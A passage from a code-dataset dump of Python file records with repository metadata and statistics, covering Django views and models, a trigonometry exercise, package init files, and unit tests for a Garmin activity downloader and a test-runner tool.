] | 6 | 2021-12-02T11:19:44.000Z | 2022-03-27T06:27:21.000Z | product/widgets/__init__.py | hung3a8/greenier | 7e67847b21a3b2ab1b066eb30c4dd42a6e3dcb82 | [
"MIT"
] | null | null | null | product/widgets/__init__.py | hung3a8/greenier | 7e67847b21a3b2ab1b066eb30c4dd42a6e3dcb82 | [
"MIT"
] | null | null | null | from .filemage import *
from .select2 import *
| 15.666667 | 23 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.170213 | 47 | 2 | 24 | 23.5 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc4d567701f228326ff770aefdc3e17fb94e5796 | 187 | py | Python | src/kuzushiji_data/data_config.py | aihill/kuzushiji-recognition | 3b677c086a915691c02fa4e655ce1def9b0326a7 | [
"MIT"
] | 1 | 2019-10-24T13:05:18.000Z | 2019-10-24T13:05:18.000Z | src/kuzushiji_data/data_config.py | aihill/kuzushiji-recognition | 3b677c086a915691c02fa4e655ce1def9b0326a7 | [
"MIT"
] | null | null | null | src/kuzushiji_data/data_config.py | aihill/kuzushiji-recognition | 3b677c086a915691c02fa4e655ce1def9b0326a7 | [
"MIT"
] | null | null | null | data_dir = 'C:/Users/stnu2/Documents/Kaggle/kuzushiji-recognition/data'
font_path = 'C:/Users/stnu2/Documents/Kaggle/kuzushiji-recognition/NotoSansCJKjp-hinted/NotoSansCJKjp-Regular.otf' | 93.5 | 114 | 0.828877 | 24 | 187 | 6.375 | 0.625 | 0.078431 | 0.143791 | 0.261438 | 0.601307 | 0.601307 | 0.601307 | 0 | 0 | 0 | 0 | 0.01105 | 0.032086 | 187 | 2 | 114 | 93.5 | 0.834254 | 0 | 0 | 0 | 0 | 0.5 | 0.84492 | 0.84492 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc4f0349b8551872c05be856119e0b2bf5715983 | 250 | py | Python | new_users/models.py | wangjinyu124419/django1.8_demo | bd61264afe246b231d9724be2675b6bae433d180 | [
"MIT"
] | null | null | null | new_users/models.py | wangjinyu124419/django1.8_demo | bd61264afe246b231d9724be2675b6bae433d180 | [
"MIT"
] | 7 | 2020-06-05T21:47:36.000Z | 2022-03-11T23:52:50.000Z | new_users/models.py | wangjinyu124419/django1.8_demo | bd61264afe246b231d9724be2675b6bae433d180 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import AbstractUser, Group
# Create your models here.
class CmsUser(AbstractUser):
pass
class CmsGroup(Group):
pass | 17.857143 | 51 | 0.748 | 34 | 250 | 5.5 | 0.558824 | 0.160428 | 0.181818 | 0.224599 | 0.352941 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0.004739 | 0.156 | 250 | 14 | 52 | 17.857143 | 0.881517 | 0.184 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.285714 | 0.428571 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
cc7e704e7125c6357a85d6b05c2281bbff4cec4d | 674 | py | Python | Mundo01/Exercicios/ex018.py | molonti/CursoemVideo---Python | 4f6a7af648f7f619d11e95fa3dc7a33b28fcfa11 | [
"MIT"
] | null | null | null | Mundo01/Exercicios/ex018.py | molonti/CursoemVideo---Python | 4f6a7af648f7f619d11e95fa3dc7a33b28fcfa11 | [
"MIT"
] | null | null | null | Mundo01/Exercicios/ex018.py | molonti/CursoemVideo---Python | 4f6a7af648f7f619d11e95fa3dc7a33b28fcfa11 | [
"MIT"
] | null | null | null | '''import math
ang = float(input('Enter the angle: '))
seno = math.sin(math.radians(ang))
print('Angle {} has sine {:.2f}'.format(ang, seno))
coss = math.cos(math.radians(ang))
print('Angle {} has cosine {:.2f}'.format(ang, coss))
tang = math.tan(math.radians(ang))
print('Angle {} has tangent {:.2f}'.format(ang, tang))'''
from math import radians, sin, cos, tan
ang = float(input('Enter the angle: '))
seno = sin(radians(ang))
print('Angle {} has sine {:.2f}'.format(ang, seno))
coss = cos(radians(ang))
print('Angle {} has cosine {:.2f}'.format(ang, coss))
tang = tan(radians(ang))
print('Angle {} has tangent {:.2f}'.format(ang, tang)) | 39.647059 | 63 | 0.664688 | 105 | 674 | 4.266667 | 0.219048 | 0.133929 | 0.200893 | 0.28125 | 0.84375 | 0.84375 | 0.834821 | 0.683036 | 0.683036 | 0.683036 | 0 | 0.010118 | 0.120178 | 674 | 17 | 64 | 39.647059 | 0.745363 | 0.495549 | 0 | 0 | 0 | 0 | 0.331343 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
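The exercise above refactors from a module-level `import math` to importing the trig helpers by name; a minimal self-contained sketch of the equivalence (angle values chosen only for illustration):

```python
import math
from math import radians, sin, cos, tan

# Both import styles bind the same functions, so the results are identical.
ang = 30.0
assert sin(radians(ang)) == math.sin(math.radians(ang))
assert abs(sin(radians(30.0)) - 0.5) < 1e-9   # sin 30 degrees = 0.5
assert abs(cos(radians(60.0)) - 0.5) < 1e-9   # cos 60 degrees = 0.5
assert abs(tan(radians(45.0)) - 1.0) < 1e-9   # tan 45 degrees = 1
```

The `from math import ...` form only shortens the call sites; it does not change behavior.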
cca10c6db9decf881c13e5a084c37c3762e778f4 | 46 | py | Python | datafy/__init__.py | ResidentMario/datafy | dbc0d193a8c597bc784433ef04935e13856a6666 | [
"MIT"
] | null | null | null | datafy/__init__.py | ResidentMario/datafy | dbc0d193a8c597bc784433ef04935e13856a6666 | [
"MIT"
] | 2 | 2017-05-29T16:23:25.000Z | 2017-05-29T16:26:58.000Z | datafy/__init__.py | ResidentMario/datafy | dbc0d193a8c597bc784433ef04935e13856a6666 | [
"MIT"
] | null | null | null | from .datafy import get, FileTooLargeException | 46 | 46 | 0.869565 | 5 | 46 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aeb426b18598084dae90e4c65c548d432e8089ab | 400 | py | Python | tests/test_all.py | nextnanopy/nextnanopy | f28266d444f488726f16c9a4eb08e98720f5f683 | [
"BSD-3-Clause"
] | 9 | 2020-12-01T15:32:40.000Z | 2022-03-12T06:36:12.000Z | tests/test_all.py | nextnanopy/nextnanopy | f28266d444f488726f16c9a4eb08e98720f5f683 | [
"BSD-3-Clause"
] | 1 | 2022-03-16T14:46:06.000Z | 2022-03-22T14:13:32.000Z | tests/test_all.py | nextnanopy/nextnanopy | f28266d444f488726f16c9a4eb08e98720f5f683 | [
"BSD-3-Clause"
] | 4 | 2021-07-06T07:25:47.000Z | 2022-03-12T06:36:18.000Z | import unittest
from tests.test_commands import *
from tests.test_inputs import *
from tests.test_misc import *
from tests.test_outputs import *
from tests.test_shapes import *
from tests.test_defaults import *
from tests.test_config import *
from tests.test_formatting import *
from tests.test_datasets import *
from tests.test_mycollections import *
if __name__ == '__main__':
unittest.main()
| 26.666667 | 38 | 0.8 | 57 | 400 | 5.298246 | 0.315789 | 0.298013 | 0.430464 | 0.566225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13 | 400 | 14 | 39 | 28.571429 | 0.867816 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.846154 | 0 | 0.846154 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
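The `tests/test_all.py` aggregator above star-imports every test module so that `unittest.main()` can discover their `TestCase` classes from the aggregator's own namespace. A minimal self-contained sketch of that discovery mechanism, where `DummyTest` is a hypothetical stand-in for a class a star import would pull in:

```python
import unittest

class DummyTest(unittest.TestCase):
    """Stand-in for a TestCase that a star import would bring into scope."""
    def test_truth(self):
        self.assertTrue(True)

# unittest.main() walks the module namespace the same way; here the loader
# is driven explicitly so the sketch runs without calling sys.exit().
suite = unittest.TestLoader().loadTestsFromTestCase(DummyTest)
result = unittest.TextTestRunner(verbosity=0).run(suite)
```

Any `TestCase` visible in the aggregator module is collected, which is why the star imports are enough.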
9de1b357d72233a7c2ffe111bc3857458ff01af6 | 2,411 | py | Python | enc/views.py | coxmediagroup/nodemeister | ecfd2c04f516b1ea022c55ce4372976055a39e5f | [
"Apache-2.0"
] | null | null | null | enc/views.py | coxmediagroup/nodemeister | ecfd2c04f516b1ea022c55ce4372976055a39e5f | [
"Apache-2.0"
] | null | null | null | enc/views.py | coxmediagroup/nodemeister | ecfd2c04f516b1ea022c55ce4372976055a39e5f | [
"Apache-2.0"
] | null | null | null | # Create your views here.
from django.http import HttpResponse
import enc
import yaml
def puppet(request, hostname):
"""
The view used to generate YAML for the puppet node_terminus script.
Calls enc.get_host_data(hostname), formats that into a dict,
and returns the yaml.safe_dump() of that as the response content.
:param request: Django request object
:param hostname: name of the host to return YAML for
:type hostname: string
:returns: HttpResponse of YAML
"""
(classlist, params) = enc.get_host_data(hostname)
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response, content_type="application/x-yaml")
def walkit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'walk')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
def classworkit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'classwork')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
def workit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'work')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
def optworkit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'optwork')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
| 35.985075 | 73 | 0.712982 | 313 | 2,411 | 5.364217 | 0.258786 | 0.053603 | 0.035736 | 0.05003 | 0.746278 | 0.733175 | 0.733175 | 0.711138 | 0.711138 | 0.711138 | 0 | 0 | 0.183326 | 2,411 | 66 | 74 | 36.530303 | 0.852717 | 0.361261 | 0 | 0.5 | 1 | 0 | 0.089185 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.178571 | false | 0 | 0.107143 | 0 | 0.464286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae19667d008a42fb2c47b78611d405c1f73c86f0 | 31 | py | Python | figpager/__init__.py | gtdang/figpager | b4d77a937ea5d9682e747049d98d692e9d24f7ed | [
"MIT"
] | null | null | null | figpager/__init__.py | gtdang/figpager | b4d77a937ea5d9682e747049d98d692e9d24f7ed | [
"MIT"
] | null | null | null | figpager/__init__.py | gtdang/figpager | b4d77a937ea5d9682e747049d98d692e9d24f7ed | [
"MIT"
] | null | null | null | from .figpager import FigPager
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
881df6670abb4eecb5a9e0a0ad429563ab63251a | 13,147 | py | Python | tests/test_download.py | jamesmstone/garpy | 96255f108fd8c194e935b9fc8e2ab7be19acab12 | [
"Apache-2.0"
] | 18 | 2020-01-13T10:38:24.000Z | 2022-03-02T17:06:00.000Z | tests/test_download.py | jamesmstone/garpy | 96255f108fd8c194e935b9fc8e2ab7be19acab12 | [
"Apache-2.0"
] | 13 | 2019-09-23T14:16:23.000Z | 2022-03-29T04:16:16.000Z | tests/test_download.py | jamesmstone/garpy | 96255f108fd8c194e935b9fc8e2ab7be19acab12 | [
"Apache-2.0"
] | 5 | 2019-11-02T16:22:17.000Z | 2022-01-07T06:15:24.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
from unittest.mock import Mock
from conftest import get_activity, get_mocked_response
from garpy import Activities, ActivitiesDownloader, Activity
from garpy.download import DEFAULT_FORMATS
RESPONSE_EXAMPLES_PATH = Path(__file__).parent / "response_examples"
class TestActivitiesDownloader:
"""download.ActivitiesDownloader"""
def test_backup_dir_with_path(self, client, tmp_path):
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.backup_dir.exists()
assert downloader.backup_dir == tmp_path
def test_backup_dir_with_str(self, client, tmp_path):
downloader = ActivitiesDownloader(client, str(tmp_path))
assert isinstance(downloader.backup_dir, Path)
assert downloader.backup_dir.exists()
assert downloader.backup_dir == tmp_path
def test_backup_dir_inexistent(self, client, tmp_path):
tmp_path.rmdir()
assert not tmp_path.exists()
downloader = ActivitiesDownloader(client, str(tmp_path))
assert downloader.backup_dir.exists()
assert downloader.backup_dir == tmp_path
def test_existing_files_is_empty(self, client, tmp_path):
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.existing_files == set()
def test_existing_files_has_file_after_download(self, activity, client, tmp_path):
with client:
client.session.get = Mock(
return_value=get_mocked_response(
200, text="Trust me, this is a GPX file"
),
func_name="client.session.get()",
)
fmt = "gpx"
activity.download(client, fmt, tmp_path)
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.existing_files == {
activity.get_export_filepath(tmp_path, fmt)
}
def test_not_found_inexistent(self, client, tmp_path):
downloader = ActivitiesDownloader(client, str(tmp_path))
assert not (downloader.backup_dir / ".not_found").exists()
assert downloader.not_found == set()
def test_not_found_empty(self, client, tmp_path):
downloader = ActivitiesDownloader(client, str(tmp_path))
(downloader.backup_dir / ".not_found").touch()
assert (downloader.backup_dir / ".not_found").exists()
assert downloader.not_found == set()
def test_not_found_has_file_after_failed_download(self, activity, client, tmp_path):
with client:
client.session.get = Mock(
return_value=get_mocked_response(404), func_name="client.session.get()"
)
fmt = "gpx"
activity.download(client, fmt, tmp_path)
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.not_found == {activity.get_export_filepath(tmp_path, fmt)}
def test_discover_formats_to_download_with_backup_from_scratch(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 10
for activity, formats in to_download.items():
assert set(formats) == set(DEFAULT_FORMATS)
def test_discover_formats_to_download_with_incremental_backup(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
activity = Activity.from_garmin_activity_list_entry(activities[0])
for fmt in DEFAULT_FORMATS:
activity.download(client_activities, fmt, tmp_path)
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 9
for activity, formats in to_download.items():
assert set(formats) == set(DEFAULT_FORMATS)
def test_discover_formats_to_download_with_not_found(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
# Download one activity manually first
activity = Activity.from_garmin_activity_list_entry(activities[0])
(tmp_path / ".not_found").write_text(
str(activity.get_export_filepath(tmp_path, "gpx"))
)
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 10
for activity, formats in to_download.items():
if len(formats) < len(DEFAULT_FORMATS):
assert "gpx" not in formats
assert set(formats) <= set(DEFAULT_FORMATS)
else:
assert set(formats) == set(DEFAULT_FORMATS)
def test_discover_formats_to_download_with_backup_up_to_date(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
# Download everything manually first
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
activity.download(client_activities, fmt, tmp_path)
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 0
def test_download_with_backup_from_scratch(self, client_activities, tmp_path):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
activities = Activities.list(client_activities)
downloader.download_all(activities)
assert len(list(tmp_path.glob("*"))) == len(activities) * len(
DEFAULT_FORMATS
)
def test_download_with_backup_up_to_date(self, client_activities, tmp_path):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Download everything manually first
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
activity.download(client_activities, fmt, tmp_path)
assert len(list(tmp_path.glob("*"))) == len(activities) * len(
DEFAULT_FORMATS
)
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert len(list(tmp_path.glob("*"))) == len(activities) * len(
DEFAULT_FORMATS
)
def test_download_with_backup_up_to_date_and_files_not_found(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Download everything manually first and fake that GPX was not found for all activities
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
if fmt == "gpx":
with open(
str(Path(tmp_path) / ".not_found"), mode="a"
) as not_found:
not_found.write(
str(activity.get_export_filepath(tmp_path, fmt).name)
+ "\n"
)
else:
activity.download(client_activities, fmt, tmp_path)
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 1
)
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 1
)
def test_download_with_files_not_found(self, client_activities, tmp_path):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Fake that GPX was not found for all activities
for activity_entry in activities:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
if fmt == "gpx":
with open(
str(Path(tmp_path) / ".not_found"), mode="a"
) as not_found:
not_found.write(
str(activity.get_export_filepath(tmp_path, fmt).name)
+ "\n"
)
assert (
len(list(tmp_path.glob("*"))) == 1
), "There should be a '.not_found' file in the backup directory"
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 1
)
def test_download_with_files_not_found_and_some_backed_up(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Fake that GPX was not found for all activities
for activity_entry in activities[:5]:
activity = Activity.from_garmin_activity_list_entry(activity_entry)
for fmt in DEFAULT_FORMATS:
if fmt == "gpx":
with open(
str(Path(tmp_path) / ".not_found"), mode="a"
) as not_found:
not_found.write(
str(activity.get_export_filepath(tmp_path, fmt).name)
+ "\n"
)
else:
activity.download(client_activities, fmt, tmp_path)
assert len(list(tmp_path.glob("*"))) == 5 * (len(DEFAULT_FORMATS) - 1) + 1
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_all(Activities.list(client_activities))
assert (
len(list(tmp_path.glob("*")))
== len(activities) * (len(DEFAULT_FORMATS) - 1) + 5 + 1
)
def test_download_one_activity_with_backup_from_scratch(
self, client_activities, tmp_path
):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
activity = Activity.from_garmin_connect(9766544337, client_activities)
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader.download_one(activity)
assert len(list(tmp_path.glob("*"))) == len(DEFAULT_FORMATS)
def test_call_for_all_activities(self, client_activities, tmp_path):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader()
assert len(list(tmp_path.glob("*"))) == len(
client_activities.list_activities()
) * len(DEFAULT_FORMATS)
def test_call_for_one_activity(self, client_activities, tmp_path):
assert len(list(tmp_path.glob("*"))) == 0
with client_activities:
# Discover what should be downloaded
downloader = ActivitiesDownloader(client_activities, tmp_path)
downloader(activity_id=9766544337)
assert len(list(tmp_path.glob("*"))) == len(DEFAULT_FORMATS)
| 43.246711 | 99 | 0.612383 | 1,379 | 13,147 | 5.531545 | 0.086294 | 0.075249 | 0.05978 | 0.072365 | 0.884767 | 0.871002 | 0.862218 | 0.83967 | 0.835081 | 0.799161 | 0 | 0.007102 | 0.303872 | 13,147 | 303 | 100 | 43.389439 | 0.826377 | 0.04328 | 0 | 0.674699 | 0 | 0 | 0.021021 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 1 | 0.080321 | false | 0 | 0.02008 | 0 | 0.104418 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
888112487e13f62b87bceb9cdb075dab8f1ce776 | 46 | py | Python | imagepy/tools/Measure/angle_tol.py | Pad0y/imagepy | 23f41b64ade02f94b566b0d23a4b6459c1a1578d | [
"BSD-4-Clause"
] | null | null | null | imagepy/tools/Measure/angle_tol.py | Pad0y/imagepy | 23f41b64ade02f94b566b0d23a4b6459c1a1578d | [
"BSD-4-Clause"
] | null | null | null | imagepy/tools/Measure/angle_tol.py | Pad0y/imagepy | 23f41b64ade02f94b566b0d23a4b6459c1a1578d | [
"BSD-4-Clause"
] | null | null | null | from sciapp.action import AngleTool as Plugin
| 23 | 45 | 0.847826 | 7 | 46 | 5.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 46 | 1 | 46 | 46 | 0.975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee1695e7f927ab7eee34e7dc81e830d1e437ecd2 | 17 | py | Python | nld/__init__.py | andcarnivorous/NLD | 16b66f4c78f4b5799ff6f175f7f0ffb1fc2abfb7 | [
"MIT"
] | 1 | 2020-12-01T22:25:15.000Z | 2020-12-01T22:25:15.000Z | nld/__init__.py | andcarnivorous/NLD | 16b66f4c78f4b5799ff6f175f7f0ffb1fc2abfb7 | [
"MIT"
] | null | null | null | nld/__init__.py | andcarnivorous/NLD | 16b66f4c78f4b5799ff6f175f7f0ffb1fc2abfb7 | [
"MIT"
] | null | null | null | from . import nld | 17 | 17 | 0.764706 | 3 | 17 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 17 | 1 | 17 | 17 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee21b6d63dc83c96e43079a25473ae8a88674ba1 | 4,794 | py | Python | test/test_atvetestrunner.py | TE-ToshiakiTanaka/atve | e6ad4d2343dc9271d173729c2680eddf3d5dd8a6 | [
"MIT"
] | null | null | null | test/test_atvetestrunner.py | TE-ToshiakiTanaka/atve | e6ad4d2343dc9271d173729c2680eddf3d5dd8a6 | [
"MIT"
] | null | null | null | test/test_atvetestrunner.py | TE-ToshiakiTanaka/atve | e6ad4d2343dc9271d173729c2680eddf3d5dd8a6 | [
"MIT"
] | null | null | null | import os
import sys
import mock
from nose.tools import with_setup, raises, ok_, eq_
from atve.application import AtveTestRunner
from atve.workspace import Workspace
from atve.exception import *
class TestAtveTestRunner(object):
@classmethod
def setup(cls):
cls.runner = AtveTestRunner()
cls.root = os.path.normpath(os.path.join(os.path.dirname(__file__)))
cls.script_path = os.path.join(cls.root, "data")
cls.workspace = Workspace(os.path.join(cls.root, "workspace"))
cls.report_path = cls.workspace.mkdir("report")
@classmethod
def teardown(cls):
cls.workspace.rmdir("")
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_01(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("success.py", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_02(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("failed.py", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("notdefine.py", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_success_04(self):
self.runner.execute("notdefine", self.script_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_failed_01(self):
self.runner.execute("notexists.py", self.script_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_failed_02(self):
self.runner.execute("success.py", self.workspace.mkdir("script"))
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_failed_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute("not.pydefine", self.script_path, v=0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_01(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"success.py", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) > 0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_02(self):
